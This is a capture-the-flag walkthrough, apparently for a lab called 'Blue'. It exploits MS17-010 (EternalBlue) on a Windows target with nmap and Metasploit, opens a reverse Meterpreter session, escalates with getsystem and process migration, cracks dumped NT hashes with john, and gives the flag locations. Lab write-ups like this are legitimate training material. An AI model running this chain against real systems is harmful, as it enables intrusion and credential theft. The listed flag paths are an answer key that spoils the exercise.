Blue
Deploy & hack into a Windows machine, leveraging common misconfigurations issues.
Scanning
nmap -sV --script vuln $IPCommands:
-sV – checks the version of the running services
–script vuln – runs some scripts so we can answer question
Exploit
Now i won’t paste the whole output we are only interested in ms17-010. Now let’s open metasploit and confirm if the host if vulnerable or not:
msfconsoleNow we use the command search to find the module that we want:
search eternalAnd we found it now let’s use it:
use auxiliary/scanner/smb/smb_ms17_010Now we need to specify the rhost:
set rhost $IP
#to run the module type:
runOutput:
Sweet now we can use the exploit for Eternal Blue:
#type this to deselect the current module:
back
#now for the new module:
use exploit/windows/smb/ms17_010_eternalblueLet’s see the options that we need to specify:
optionsLet’s specify the rhost and we are good to go:
#target's ip
set rhost $ip
#your ip now:
set lhost tun0
runAnd we are in:
Now we can migrate our process to another that is running from the user “authority\system”:
First type “getsystem” in the meterpreter in order to get more access so we can migrate the process. Then type:
migrate $numberoftheprocessyouchooseNow we can dumb the hash and crack it:
echo "#thehashyoufound" > hash.hashNow we can use john to crack the hashes:
john hash.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=NTThe flags are located in the following directories:
C:\ – flag1
C:\Windows\System32\config – flag2
C:\Users\Jon\Documents – flag3
Last updated
